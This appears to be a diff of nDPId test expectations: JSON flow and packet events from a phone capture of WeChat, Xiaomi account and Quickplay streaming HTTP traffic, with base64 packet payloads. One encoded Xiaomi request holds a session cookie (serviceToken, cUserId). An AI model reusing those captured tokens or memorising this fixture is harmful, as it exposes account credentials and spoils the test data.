+00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000110390,"flow_last_seen":1429000110390,"flow_idle_time":7440000,"flow_min_l4_payload_len":625,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":625,"midstream":1,"ts_msec":1429000110390,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":0,"content_type":"","user_agent":"MicroMessenger Client"}}
 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1429000110528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":262,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":262,"pkt_l4_len":226,"ts_msec":1429000110528,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPYrhEAArQaNjMvNk9cKNqn6AFCLVl6azfAZGFZbUBgIKKjyAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ4DQoNCoJfAAAAAFUr0H3fAhACF0hkbD5sDN+EgwDMBQYGAIBAF7nY9ngjTY7+FL\/5+Nv5cQ=="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000117728,"flow_last_seen":1429000117728,"flow_idle_time":7440000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":582,"flow_avg_l4_payload_len":582,"midstream":1,"ts_msec":1429000117728,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 01228{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1429000117728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":638,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":638,"pkt_l4_len":602,"ts_msec":1429000117728,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAm69YkAAPwYFAwo2qfo2s4xB3D0AUJYYUVzgorreUBgAc7mmAABHRVQgL3Bhc3MvdjIvc2FmZS91c2VyL2NvcmVJbmZvP3NpZ25hdHVyZT11JTJGNzNkRVhCSGJlamV2MElTTnduR3l5ZmVUdyUzRCZ1c2VySWQ9TXo1WHI1VVhLdXc4M2h4ZDZZbXMydyUzRCUzRCBIVFRQLzEuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvb2tpZTogY1VzZXJJZD1SbmVTNDhuLWRZX1ZlMllKU3NWLXF0RUxvOG87IHNlcnZpY2VUb2tlbj1qYWl5azdjUlQ0WDI0RWp3eENnQUxHOEFJdk9pWmNWTFU1cCsyaW9HSzVaK1MrWDFLbkJwOHBGUDJIV3FhVFJEWHU1eUY3YjZqaDdYdDQxZTZZOXYyUVRGN2tnbUhrSjBhSXJ0Sm9iOTBaZ2lBMy8rYlZQWXBrcVM3ajhUREorNEo3Rkt3VzFsZDZCWSswakU4SncxbGYrTVE0OEVUQmlOc01FbEthUGh2MEREOVZvUlMxNXRVM2dSMHlmVEcxWHMNClVzZXItQWdlbnQ6IERhbHZpay8xLjYuMCAoTGludXg7IFU7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIE1JVUkvVjYuNC4yLjAuS1hETUlDQikNCkhvc3Q6IGFwaS5hY2NvdW50LnhpYW9taS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="}
-00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000117728,"flow_last_seen":1429000117728,"flow_idle_time":7440000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":582,"flow_avg_l4_payload_len":582,"midstream":1,"ts_msec":1429000117728,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"api.account.xiaomi.com","url":"api.account.xiaomi.com\/pass\/v2\/safe\/user\/coreInfo?signature=u%2F73dEXBHbejev0ISNwnGyyfeTw%3D&userId=Mz5Xr5UXKuw83hxd6Yms2w%3D%3D","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}}
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000117728,"flow_last_seen":1429000117728,"flow_idle_time":7440000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":582,"flow_avg_l4_payload_len":582,"midstream":1,"ts_msec":1429000117728,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"api.account.xiaomi.com","url":"api.account.xiaomi.com\/pass\/v2\/safe\/user\/coreInfo?signature=u%2F73dEXBHbejev0ISNwnGyyfeTw%3D&userId=Mz5Xr5UXKuw83hxd6Yms2w%3D%3D","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}}
 01498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1429000118045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":831,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":831,"pkt_l4_len":795,"ts_msec":1429000118045,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAy+57kAArQaZmTazjEEKNqn6AFDcPeCiut6WGFOiUBgIJVI5AABIVFRQLzEuMSAyMDAgT0sNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb250ZW50LUVuY29kaW5nOiBnemlwDQpEYXRlOiBUdWUsIDE0IEFwciAyMDE1IDA4OjI4OjM3IEdNVA0KU2VydmVyOiBUZW5naW5lLzIuMC4xDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb247Y2hhcnNldD11dGYtOA0KQ29udGVudC1MZW5ndGg6IDU1Ng0KDQofiwgAAAAAAAADBMHXokMwAADQD+pDVCuuR7VCzdrerESNxijK199zgLVnYggNE5ULioIZGP6CKSQ+J1Ue9LQPP\/PeL9xYw3Gkgs8aCeFd\/zZqCdqbSs4SDagv3Q8gbXJOLHNZZfmdTsJ6vPDYpe+\/rdailf+Vy4WCt5JCSfPLvLm\/VjBPjj45GMX6eUks60t+xxt21vhZm+cZaqa7DoZ7yob2ejBdIHAVjR1TTdJhFubG5KBya8nY0zzMWLsuzvCvt9glIynGQHg+BLRZzPC8ZTGPUyOvUh05tiZ\/balrrwKQt2cEeJstEBP0D5BLZnKvY160w+\/OrxB+sjFauMt5dnHUcI3t7SoTqChgxCrhMkNhG6YVl2LK8pgjuYhqcDRox+KgQzOA\/hLmGzg3uirtssbFIVC5Aro3ACcGCwISGwb1VxWHonPvyWHNDlG81Bqq3QQetunNZnl6oz4rq\/ZHNPTVG61wMgLdvvo4GWhjgZ\/bnblrSFNGd7Mdr5MexXVx6SfeJVyvwBelPETxWHKKoRDa8ZjUvT0cEJOB7G\/G7e4ZZ\/83OAc7CIIAAEA\/iIulwzriBqhJkUE6bpVlTg1QY+rX1\/uCF5JNOyMtykH7DdhqEwaXY8s7mPz38wS8mngvjnR+4AS+bZOCqFuqMeaMn6SzJIMOPFhSp7GcsxUbtqiwMa7\/yvtnpf2t24H4WaAC+sVExSgCQaWyVTSeVY6vezz8ABeIl3WAAgAA"}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000153937,"flow_last_seen":1429000153937,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"ts_msec":1429000153937,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 01049{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1429000153937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"ts_msec":1429000153937,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeag6kAAPwZJswo2qfp4HCMoyzEAUC00WpDdwOXGUBgBycCpAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNDgudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="}
-01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000153937,"flow_last_seen":1429000153937,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"ts_msec":1429000153937,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0048.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}}
+01143{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000153937,"flow_last_seen":1429000153937,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"ts_msec":1429000153937,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0048.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}}
 02349{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1429000156273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1456,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1456,"pkt_l4_len":1420,"ts_msec":1429000156273,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBaB3UUAArQYBdngcIygKNqn6AFDLMd3LpTQtNFxOUBAIItXfAAChEIrgrleYAhFa3F3938BggSrcIn+nqVX5sByKXTUtTZ+S0IwO\/hIwf0BB2uc3Bf5jC1QfzUHjRvDUIOnnsb5a0uxxhiIVAqWnEYC45w18yjCMLPuOKVZeOYgfCQVjYsxLAKkdXaRkmMu4Zoel0HztrVYR1cnta\/vSYGQ0WkMhgl3KFYUm\/X4qjjWEdowcfDAWr\/FWJBR4jsXSxR8EQOd7RYpfWOl0YqAXrcURgivoA\/Vazm9dSSQ6DzW0D1TNTghMrqCseZaLLp2diY5etWqcT5Lxxdnl2ino6PEahKmf04RjOZq83lwn5PEPti9QeNcfMNctSiHj28O5VeDtauVKLipzStAYJu6O1tMaMLByrHeLYYc5MbsLRR9vao6KZRnJE1AEzpmLa\/+YrNJZcLrW3joqQ2AvZzJNsHv1pr7090xMkT87olqCX5Yd5dgxMvv2CbBfzbv7iN0239xxLePmefbZXxmf1ljpyZUWt+YUi19f0cGaafC5roKKnRsDLjalFhQzNZMDN1+qROgcpPpFrfcPRzSCRX2oM3IXqFNyhnIqEBeoqjt\/rN0OghieSXA+J4\/fnibDY2oBF\/qPi7PmT7+EZQfp4dOU7LXGxwfkHyb\/+nSUhuDDHBPkRtLg+XO3xXfDG63CCzgP9j+ew7ylJL7s8zjEAnk0iP7KsAXK1fFcvUkB5LITD3qa1hjsRXNIyWIaxMkwR8GhlPLtf0hpPiS0Um8a1yduUSn4xM5n3AHwQrDyknL7fxErOcmIBqXcP2oyyyTV+m9b64iHrtRxBINGeYaff6lhmqnRqCvGC1F52Og\/seNDfW8RWv4yBXzQwblMI7xviVAgMjEyKmjtOXwyzWj0J+YuHjA3wXbbyRFf\/zujxfqXq0HOg5HobG69sZOgCtlNOxGxs6uNG3Nyl1bm6YuhORfGFVH4dDhxB4pM4mawqKQgNd3ZivrDKzWiLphhw89pFSEPmrYR+dSw4\/6dNuOLRnG16Am5LUzsom4k95ky9x\/PVPzeU+5ie6mhYpgOrbjeFpz+rg+m9C+NB8SEBd6muVe4B37GCYUkUck7iEmhbPSKsrUqKYVveBJ0WJIstk9mKFzxlfKH3J2\/bjYqxEQYbmgG6oJ5ralnDKawN31PTuvOshsQceM7W53\/H7rfpivL6lr\/kjGpOhEd9Dxxlf9p+4v7nxfQAiorCo+Ipnx1Vx4\/M8DFoeolmxcpnpC1\/t87cEimWGKlQKNWBmqgBX3lF+jG0RumppZSWz\/aQfU6VQwCojXD7XsZoKlt0fqkAcQPgNbx4gtOwebSddbvGBn7uPBEFCe1qtOY1P6e8nyGK8y1LANkR3tsNsXJFvHkj5HBf+Fth6gbnan75B2fOeWrkdUU90lajYKwLL1LL5gxqWv1nPgRm5gG0V\/LUY3dCEIra5BI+d3CAtAPKtdluT\/JXWML4j3eAT74+s9ouu5yox25rXWvrCvhcuf5BYDjdzBBmrYB\/t4fb52bttXAQuL80qQnY5Oj1X5f+Um3rpgjwFtGj7n30bbQASEZTdFPUOe8kJs7mBkrIY6yotsjZG+hKNfMJZdhU8ZShuzC8djNjp9NuCLli+\/ugxOOk4+twmaL+UUbEqGDcxcAEBa5EyOAV7RfqezgWcaQ3dbJjWXdNWxetLCdQ7XanJt3eAkt933KoymlC4XmU95LAhWF33+FFwL3BYas4y5X8wDDUnULI8QtkzKEN2oLGgIewtkuDrW4wpL3EZsIKv86JV8UzFxUMaP2MiczrH7WqOOsj1ytSR\/mRWDeXJftrtXq0qR46GntPeDZXJQKpY9CB2cQr+2LnDbM8iBOGE8HrF8a0W0JfepPoC6ozHQ5CxM0HE7L3V4aaQ=="}
 01049{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1429000156459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"ts_msec":1429000156459,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaip0AAPwZH9go2qfp4HCMoyzEAUC00XE7dy64AUBhgH5dQAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNDkudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="}
-00649{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1429000052350,"flow_last_seen":1429000055158,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":271,"midstream":1,"ts_msec":1429000179906,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}}
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1429000052350,"flow_last_seen":1429000055158,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":271,"midstream":1,"ts_msec":1429000179906,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000207973,"flow_last_seen":1429000207973,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"ts_msec":1429000207973,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 01050{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1429000207973,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"ts_msec":1429000207973,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYfhkAAPwbLFwo2qfp4HCMoyzIAUDz1EP7kfsOCUBgByRv\/AABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTIudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="}
-01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000207973,"flow_last_seen":1429000207973,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"ts_msec":1429000207973,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0052.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}}
+01143{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000207973,"flow_last_seen":1429000207973,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"ts_msec":1429000207973,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0052.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}}
 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1429000210014,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":128,"pkt_l4_len":92,"ts_msec":1429000210014,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAHCiFUAArQbb4XgcIygKNqn6AFDLMuSI3uA89RK8UBgIIiZoAAA7o06lOUMR9b0tN4NqWqjYHmUkbAcezqY5k1Ckm0MtYSmllf\/mEyyNorAHBlAKlc3tlqWmVMYy6YLe45g7yxi7BP1GlteorxU="}
 01049{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1429000210215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"ts_msec":1429000210215,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYhUEAAPwbJTQo2qfp4HCMoyzIAUDz1ErzkiN8oUBhgH586AABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTMudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000237766,"flow_last_seen":1429000237766,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"ts_msec":1429000237766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
